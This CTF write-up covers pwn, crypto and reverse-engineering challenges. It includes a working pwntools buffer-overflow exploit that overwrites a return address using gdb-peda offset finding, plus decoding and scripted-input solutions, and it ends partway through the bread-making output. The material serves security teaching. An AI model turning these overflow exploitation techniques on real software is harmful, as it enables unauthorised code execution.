"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨"
rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
can you write me a heartfelt message to cheer me up? :(
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff
[*] Switching to interactive mode
$ ls
flag.txt
run
$ cat flag.txt
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
```
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
ret2generic-flag-reader (pwn)
Use the BOF to make it jump to the super_generic_flag_reading_function_please_ret_to_me function.

```
$ file ret2generic-flag-reader
ret2generic-flag-reader: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c749a16c9546cfe2cab694374c7d003c2bbb52f3, for GNU/Linux 3.2.0, not stripped
$ gdb -q ./ret2generic-flag-reader
Reading symbols from ./ret2generic-flag-reader...(no debugging symbols found)...done.
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010a0  puts@plt
0x00000000004010b0  fclose@plt
0x00000000004010c0  setbuf@plt
0x00000000004010d0  fgets@plt
0x00000000004010e0  gets@plt
0x00000000004010f0  fopen@plt
0x0000000000401100  exit@plt
0x0000000000401110  _start
0x0000000000401140  _dl_relocate_static_pie
0x0000000000401150  deregister_tm_clones
0x0000000000401180  register_tm_clones
0x00000000004011c0  __do_global_dtors_aux
0x00000000004011f0  frame_dummy
0x00000000004011f6  super_generic_flag_reading_function_please_ret_to_me
0x00000000004013a5  main
0x0000000000401430  __libc_csu_init
0x00000000004014a0  __libc_csu_fini
0x00000000004014a8  _fini
gdb-peda$ start
[----------------------------------registers-----------------------------------]
RAX: 0x4013a5 (<main>: endbr64)
RBX: 0x0
RCX: 0x401430 (<__libc_csu_init>: endbr64)
RDX: 0x7fffffffdf18 --> 0x7fffffffe26b ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader")
RDI: 0x1
RBP: 0x401430 (<__libc_csu_init>: endbr64)
RSP: 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
RIP: 0x4013a5 (<main>: endbr64)
R8 : 0x7ffff7dced80 --> 0x0
R9 : 0x7ffff7dced80 --> 0x0
R10: 0x0
R11: 0x0
R12: 0x401110 (<_start>: endbr64)
R13: 0x7fffffffdf00 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4013a2 <super_generic_flag_reading_function_please_ret_to_me+428>: nop
   0x4013a3 <super_generic_flag_reading_function_please_ret_to_me+429>: leave
   0x4013a4 <super_generic_flag_reading_function_please_ret_to_me+430>: ret
=> 0x4013a5 <main>: endbr64
   0x4013a9 <main+4>: push rbp
   0x4013aa <main+5>: mov rbp,rsp
   0x4013ad <main+8>: sub rsp,0x20
   0x4013b1 <main+12>: mov rax,QWORD PTR [rip+0x2ca8] # 0x404060 <stdout@@GLIBC_2.2.5>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
0008| 0x7fffffffde30 --> 0x1
0016| 0x7fffffffde38 --> 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader")
0024| 0x7fffffffde40 --> 0x100008000
0032| 0x7fffffffde48 --> 0x4013a5 (<main>: endbr64)
0040| 0x7fffffffde50 --> 0x0
0048| 0x7fffffffde58 --> 0x48185c2f2775a721
0056| 0x7fffffffde60 --> 0x401110 (<_start>: endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Temporary breakpoint 1, 0x00000000004013a5 in main ()
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ c
Continuing.
alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
slap on some flavortext and there's no way rob will fire me now!
this is genius!! what do you think?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7dcda00 --> 0xfbad208b
RDX: 0x7ffff7dcf8d0 --> 0x0
RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a
RDI: 0x0
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffde28 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RIP: 0x40142f (<main+138>: ret)
R8 : 0x7ffff7dcf8c0 --> 0x0
R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0)
R10: 0x3
R11: 0x246
R12: 0x401110 (<_start>: endbr64)
R13: 0x7fffffffdf00 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x401424 <main+127>: call 0x4010e0 <gets@plt>
   0x401429 <main+132>: mov eax,0x0
   0x40142e <main+137>: leave
=> 0x40142f <main+138>: ret
   0x401430 <__libc_csu_init>: endbr64
   0x401434 <__libc_csu_init+4>: push r15
   0x401436 <__libc_csu_init+6>: lea r15,[rip+0x29d3] # 0x403e10
   0x40143d <__libc_csu_init+13>: push r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde28 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffde30 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffde38 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffde40 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffde48 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffde50 ("AJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffde58 ("AAKAAgAA6AAL")
0056| 0x7fffffffde60 --> 0x4c414136 ('6AAL')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040142f in main ()
gdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40
```
After 40 bytes, set the address of the super_generic_flag_reading_function_please_ret_to_me function (0x4011f6).

```python
from pwn import *

if len(sys.argv) == 1:
    p = remote('mc.ax', 31077)
else:
    p = process('./ret2generic-flag-reader')

# 40 bytes reach the saved return address; overwrite it with the
# address of super_generic_flag_reading_function_please_ret_to_me
payload = b'A' * 40
payload += p64(0x4011f6)

for _ in range(4):
    data = p.recvline().rstrip()
    print(data)
print(payload)
p.sendline(payload)
data = p.recvline().rstrip()
print(data)
```

The result of running it is as follows.

```
[+] Opening connection to mc.ax on port 31077: Done
alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
slap on some flavortext and there's no way rob will fire me now!
this is genius!! what do you think?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@\x00\x00
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}
[*] Closed connection to mc.ax port 31077
```
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}
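An added example (my own code, not the writeup's) that reproduces what peda's pattc and patto did in the two pwn challenges above: it builds peda's default extended-charset de Bruijn pattern and searches it for the bytes seen in a register or stack slot, so the offsets 48 (the string at the address in RBP in beginner-generic-pwn-number-0) and 40 (the bytes at RSP when `ret` faulted in ret2generic-flag-reader) can be recovered from a transcript without gdb. Searching an integer register value as its little-endian bytes is my own convention here.

```python
# Added example (not from the writeup): peda-style cyclic pattern and offset lookup.
from functools import lru_cache


def peda_charset() -> str:
    """Mixed charset of peda's default ("extended") pattern: the three sets are
    interleaved one character at a time, which is why the pattern starts 'AAA%AAs'."""
    upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    lower = "%$-;" + "abcdefghijklmopqrtuvwxyz"   # 's' and 'n' are moved to the digit set
    digits = "sn()" + "0123456789"
    sets = [upper, lower, digits]
    mixed, k = "", 0
    while True:
        chunk = "".join(s[k:k + 1] for s in sets)
        if not chunk:
            return mixed
        mixed += chunk
        k += 1


def de_bruijn(alphabet: str, n: int, maxlen: int) -> str:
    """Lexicographically smallest de Bruijn sequence B(k, n), cut at maxlen: every
    window of n characters is unique, so an n-byte slice pins down its offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    out: list[str] = []

    def db(t: int, p: int) -> None:
        if len(out) >= maxlen:
            return
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    out.append(alphabet[a[j]])
                    if len(out) >= maxlen:
                        return
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= maxlen:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(out)


@lru_cache(maxsize=None)
def cyclic_pattern(size: int = 0x10000) -> str:
    """Equivalent of `pattc <size>` (peda's default pattern length is 0x10000)."""
    return de_bruijn(peda_charset(), 3, size)


def pattern_offset(needle, size: int = 0x10000):
    """Equivalent of `patto <value>`: accepts the text seen in a register or stack
    slot, or an integer register value, which is searched as its little-endian
    bytes (my convention here, e.g. RBP=0x6141414541412941 -> 'A)AAEAAa')."""
    if isinstance(needle, int):
        width = max(1, (needle.bit_length() + 7) // 8)
        needle = needle.to_bytes(width, "little").decode("latin-1")
    pos = cyclic_pattern(size).find(needle)
    return pos if pos != -1 else None


if __name__ == "__main__":
    print(cyclic_pattern(100))
    # beginner-generic-pwn-number-0: the string at RBP's address starts at 48,
    # so the 8-byte slot at rbp-0x8 begins at offset 40
    print(pattern_offset("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL"))
    # ret2generic-flag-reader: bytes at RSP when `ret` faulted -> return address at 40
    print(pattern_offset("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL"))
    # the saved RBP that was overwritten sits 8 bytes before it, at 32
    print(pattern_offset(0x6141414541412941))
```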
round-the-bases (crypto)
Decode it step by step in the following order.

・base85
・base64
・base16
・ASCII (space-separated decimal codes)
・ASCII (space-separated decimal codes)
・binary decode

```python
#!/usr/bin/python3
from base64 import *

with open('round-the-bases', 'r') as f:
    data = f.read()

data = a85decode(data)
print('[+] 1:', data)
data = b64decode(data)
print('[+] 2:', data)
data = b16decode(data)
print('[+] 3:', data)
# space-separated decimal ASCII codes, twice in a row
codes = map(int, data.split(b' '))
data = ''.join([chr(code) for code in codes]).encode()
print('[+] 4:', data)
codes = map(int, data.split(b' '))
data = ''.join([chr(code) for code in codes]).encode()
print('[+] 5:', data)
# '<' and '=' stand for the bits 0 and 1; read 8 bits per character
bin_code = data.replace(b'<', b'0').replace(b'=', b'1')
data = ''.join([chr(int(bin_code[i:i+8], 2)) for i in range(0, len(bin_code), 8)]).encode()
print('[*] flag:', data)
```

The output was as follows.
wMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOQ==' [+] 2: b'35342034382033322035342034392033322035342034392033322035342034382033322035342034382033322035342034392033322035342034392033322035342034382033322035342034382033322035342034392033322035342034392033322035342034382033322035342034392033322035342034392033322035342034382033322035342034382033322035342034382033322035342034392033322035342034392033322035342034382033322035342034382033322035342034382033322035342034382033322035342034392033322035342034382033322035342034392033322035342034392033322035342034382033322035342034382033322035342034392033322035342034392033322035342034392033322035342034382033322035342034392033322035342034392033322035342034392033322035342034392033322035342034382033322035342034392033322035342034392033322035342034382033322035342034392033322035342034392033322035342034392033322035342034382033322035342034392033322035342034392033322035342034392033322035342034382033322035342034382033322035342034392033322035342034392033322035342034382033322035342034382033322035342034382033322035342034382033322035342034382033322035342034392033322035342034392033322035342034392033322035342034382033322035342034392033322035342034392033322035342034392033322035342034382033322035342034392033322035342034382033322035342034392033322035342034392033322035342034392033322035342034392033322035342034392033322035342034382033322035342034392033322035342034392033322035342034392033322035342034382033322035342034392033322035342034382033322035342034382033322035342034382033322035342034392033322035342034392033322035342034382033322035342034392033322035342034382033322035342034382033322035342034382033322035342034382033322035342034382033322035342034392033322035342034392033
32203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332
203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439' [+] 3: b'54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 
32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49' [+] 4: b'60 61 61 60 60 61 61 60 60 61 61 60 61 61 60 60 60 61 61 60 60 60 60 61 60 61 61 60 60 61 61 61 60 61 61 61 61 60 61 61 60 61 61 61 60 61 61 61 60 60 61 61 60 60 60 60 60 61 61 61 60 61 61 61 60 61 60 61 61 61 61 61 60 61 61 61 60 61 60 60 60 61 61 60 61 60 60 60 60 60 61 61 60 61 60 60 60 61 61 61 60 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 61 61 60 60 61 61 60 61 60 60 60 61 61 61 60 60 61 61 60 61 60 61 61 61 61 61 60 60 61 61 60 61 60 60 60 61 61 60 61 61 60 60 60 61 61 60 61 61 60 60 60 61 60 
61 61 61 61 61 60 61 61 61 60 61 61 61 60 61 61 61 60 60 61 60 60 60 61 61 60 61 60 60 60 61 61 61 60 60 60 60 60 61 61 61 60 60 60 60 60 60 61 61 60 60 61 61 60 61 61 60 60 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 60 61 60 61 61 61 60 60 60 60 60 61 61 61 61 61 60 61' [+] 5: b'<==<<==<<==<==<<<==<<<<=<==<<===<====<==<===<===<<==<<<<<===<===<=<=====<===<=<<<==<=<<<<<==<=<<<===<=<<<=<=====<===<===<<==<=<<<===<<==<=<=====<<==<=<<<==<==<<<==<==<<<=<=====<===<===<===<<=<<<==<=<<<===<<<<<===<<<<<<==<<==<==<<=<<<=<=====<===<=<=<===<<<<<=====<=' [*] flag: b'flag{w0w_th4t_w4s_4ll_wr4pp3d_up}'
flag{w0w_th4t_w4s_4ll_wr4pp3d_up}
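The output above is a chain of five wrappers peeled one at a time: base64, then hex, then space-separated decimal ASCII codes applied twice, and finally a string of '<' and '=' that reads as bits ('<' = 0, '=' = 1; the first 32 symbols decode to "flag"). The following is an added example, not the writeup's own script: a small layer detector that picks each decoding by the alphabet in use, plus a `wrap` helper (my construction, not part of the challenge) that applies the same layers forward so the decoder can be exercised offline. The layer order and the bit mapping are read off the output above; the detection heuristics (digit-only strings also pass the hex and base64 checks, so the tests run from most specific to least specific) are my assumption and would need adjusting for a chain that uses other alphabets.

```python
import base64
import re


def peel(layer: bytes) -> bytes:
    """Undo one encoding layer, chosen by the alphabet the string uses.

    Checks run from most specific to least specific: a string of decimal
    digits is also valid hex and valid base64, so those come last."""
    s = layer.decode("ascii")
    if set(s) <= {"<", "="}:                               # '<' = 0, '=' = 1
        bits = s.replace("<", "0").replace("=", "1")
        return int(bits, 2).to_bytes(len(bits) // 8, "big")
    if re.fullmatch(r"\d+( \d+)+", s):                     # "54 48 32 ..." decimal ASCII codes
        return bytes(int(t) for t in s.split())
    if re.fullmatch(r"[0-9a-fA-F]+", s) and len(s) % 2 == 0:
        return bytes.fromhex(s)
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        return base64.b64decode(s, validate=True)
    raise ValueError("unrecognised layer: %r" % s[:40])


def unwrap(blob: bytes, max_layers: int = 16):
    """Peel layers until a flag{...} string appears.

    Returns the flag and the list of intermediate layers (outermost first)."""
    layers = []
    cur = blob
    while not (cur.startswith(b"flag{") and cur.endswith(b"}")):
        if len(layers) >= max_layers:
            raise ValueError("too many layers, giving up")
        cur = peel(cur)
        layers.append(cur)
    return cur, layers


def wrap(flag: bytes) -> bytes:
    """Apply the same five layers forward (my helper, used only to build input)."""
    s = "".join(f"{b:08b}" for b in flag).replace("0", "<").replace("1", "=")
    s = " ".join(str(c) for c in s.encode())   # '<' -> "60", '=' -> "61"
    s = " ".join(str(c) for c in s.encode())   # '6','0',' ' -> "54 48 32"
    return base64.b64encode(s.encode().hex().encode())


if __name__ == "__main__":
    blob = wrap(b"flag{w0w_th4t_w4s_4ll_wr4pp3d_up}")
    flag, layers = unwrap(blob)
    for i, layer in enumerate(layers, 1):
        print("[+] %d: %r" % (i, layer[:48]))
    print("[*] flag:", flag)
```

Running it reproduces the shape of the output above, including the repeating "MzUzNDIwMzQzODIw..." base64 prefix, because "54 48 32 " encoded as hex and then base64 is exactly that string.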
bread-making (rev)
Decompile it with Ghidra.
undefined8 FUN_00102180(void)
{
  undefined *puVar1;
  long lVar2;
  int iVar3;
  char *pcVar4;
  size_t sVar5;
  long lVar6;
  long in_FS_OFFSET;
  char acStack200 [136];
  long local_40;

  local_40 = *(long *)(in_FS_OFFSET + 0x28);
  setbuf(stdin,(char *)0x0);
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  signal(0xe,FUN_001024d0);
  DAT_00106440 = 0;
  do {
    alarm(*(uint *)(&PTR_DAT_00106020)[DAT_00106440]);
    puts(*(char **)((&PTR_DAT_00106020)[DAT_00106440] + 8));
    do {
      pcVar4 = fgets(acStack200,0x80,stdin);
      if (pcVar4 == (char *)0x0) {
LAB_00102330:
        FUN_001024a0();
        goto LAB_00102337;
      }
      sVar5 = strcspn(acStack200,"\n");
      acStack200[sVar5] = '\0';
      puVar1 = (&PTR_DAT_00106020)[DAT_00106440];
      lVar2 = *(long *)(puVar1 + 0x18);
      if (lVar2 == 0) goto LAB_00102330;
      lVar6 = 0;
      while( true ) {
        iVar3 = strcmp(acStack200,*(char **)(puVar1 + lVar6 * 0x10 + 0x20));
        if (iVar3 == 0) break;
        lVar6 = lVar6 + 1;
        if (lVar2 == lVar6) goto LAB_00102330;
      }
      iVar3 = (**(code **)(puVar1 + lVar6 * 0x10 + 0x28))();
      if (iVar3 == -1) goto LAB_00102330;
    } while (iVar3 != 0);
    DAT_00106440 = DAT_00106440 + 1;
    puts("");
  } while (DAT_00106440 < 0xb);
  alarm(0);
  puts("it\'s the next morning");
  if (_DAT_0010641c == 0) {
    puts("mom finds flour in the sink and accuses you of making bread");
  }
  else {
    if (_DAT_00106418 == 0) {
LAB_00102337:
      puts("mom finds flour on the counter and accuses you of making bread");
    }
    else {
      if (_DAT_00106414 == 0) {
        puts("mom finds burnt bread on the counter and accuses you of making bread");
      }
      else {
        if (_DAT_00106410 == 0) {
          puts("mom finds the window opened and accuses you of making bread");
        }
        else {
          if (_DAT_0010640c == 0) {
            puts("mom finds the fire alarm in the laundry room and accuses you of making bread");
          }
          else {
            FUN_001025c0();
          }
        }
      }
    }
  }
  if (local_40 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

void FUN_001025c0(void)
{
  FILE *__stream;
  char *pcVar1;
  long in_FS_OFFSET;
  char acStack152 [136];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("mom doesn\'t suspect a thing, but asks about some white dots on the bathroom floor");
  __stream = fopen("flag.txt","r");
  if (__stream != (FILE *)0x0) {
    pcVar1 = fgets(acStack152,0x80,__stream);
    if (pcVar1 != (char *)0x0) {
      puts(acStack152);
      goto LAB_00102634;
    }
  }
  puts("couldn\'t open/read flag file, contact an admin if running on server");
LAB_00102634:
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

s_add_ingredients_to_the_bowl_00103b3c          XREF[2]: FUN_00102180:00102220(*), 00106348(*)
00103b3c 61 64 64 20 69 6e 67 72 65   ds "add ingredients to the bowl"
s_add_flour_00103b58                            XREF[3]: FUN_00102180:00102297(*), FUN_00102180:00102332(*), 00106360(*)
00103b58 61 64 64 20 66 6c 6f 75 72 00   ds "add flour"
s_add_yeast_00103b62                            XREF[2]: FUN_00102180:00102297(*), 00106370(*)
00103b62 61 64 64 20 79 65 61 73 74 00   ds "add yeast"
s_add_salt_00103b6c                             XREF[1]: 00106380(*)
00103b6c 61 64 64 20 73 61 6c 74 00      ds "add salt"
s_add_water_00103b75                            XREF[1]: 00106390(*)
00103b75 61 64 64 20 77 61 74 65 72 00   ds "add water"
00103b7f 00                               ??  00h
The main loop walks a table of 11 stages at PTR_DAT_00106020: each entry holds an alarm timeout, a prompt string, a count, and an array of (answer string, handler) pairs. Input that matches no answer, or a handler that returns -1, jumps to the failure path, a handler returning 0 advances to the next stage, and the final verdict depends on a set of global flags that the handlers leave behind. Each stage also arms alarm() with a SIGALRM handler, so the answers have to arrive quickly, which is why the interaction is scripted. Using the strings in this area as a guide and trying various inputs, work out the correct sequence of answers.
from pwn import *

if len(sys.argv) == 1:
    p = remote('mc.ax', 31796)
else:
    p = process('./bread')


def step(answer):
    # send one answer and echo the reply its handler prints
    print(answer)
    p.sendline(answer)
    print(p.recvline().rstrip().decode())


def stage(answers):
    # each stage prints its prompt, one reply per accepted answer,
    # then a blank line once the stage handler returns 0
    print(p.recvline().rstrip().decode())
    for a in answers:
        step(a)
    print(p.recvline().rstrip().decode())


stage(['add flour', 'add yeast', 'add salt', 'add water'])     # add ingredients to the bowl
stage(['hide the bowl inside a box'])                            # the ingredients are added and stirred into a lumpy dough
stage(['wait 3 hours'])                                          # the bread needs to rise
stage(['work in the basement'])                                  # it is time to finish the dough
stage(['preheat the toaster oven'])                              # the dough is done, and needs to be baked
stage(['set a timer on your phone'])                             # the bread is in the oven, and bakes for 45 minutes
stage(['watch the bread bake'])                                  # 45 minutes is an awfully long time
stage(['pull the tray out with a towel'])                        # there's no time to waste
stage(['unplug the oven', 'unplug the fire alarm', 'open the window'])   # there's smoke in the air
stage(['wash the sink', 'clean the counters',
       'flush the bread down the toilet', 'get ready to sleep'])  # the kitchen is a mess
stage(['close the window', 'replace the fire alarm',
       'brush teeth and go to bed'])                             # time to go to sleep

# "it's the next morning", mom's verdict, and the flag
for _ in range(3):
    print(p.recvline().rstrip().decode())
The output is as follows.
[+] Opening connection to mc.ax on port 31796: Done
add ingredients to the bowl
add flour
flour has been added
add yeast
yeast has been added
add salt
salt has been added
add water
water has been added

the ingredients are added and stirred into a lumpy dough
hide the bowl inside a box
the box is nice and warm

the bread needs to rise
wait 3 hours
the dough has risen

it is time to finish the dough
work in the basement
you bring a bottle of oil and a tray

the dough is done, and needs to be baked
preheat the toaster oven
the oven glows a soft red-orange

the bread is in the oven, and bakes for 45 minutes
set a timer on your phone
the timer ticks down

45 minutes is an awfully long time
watch the bread bake
the bread has risen, touching the top of the oven and catching fire

there's no time to waste
pull the tray out with a towel
the flaming loaf sizzles in the sink

there's smoke in the air
unplug the oven
the oven shuts off
unplug the fire alarm
you put the fire alarm in another room
open the window
cold air rushes in

the kitchen is a mess
wash the sink
the sink is cleaned
clean the counters
the counters are cleaned
flush the bread down the toilet
the half-baked bread is disposed of
get ready to sleep
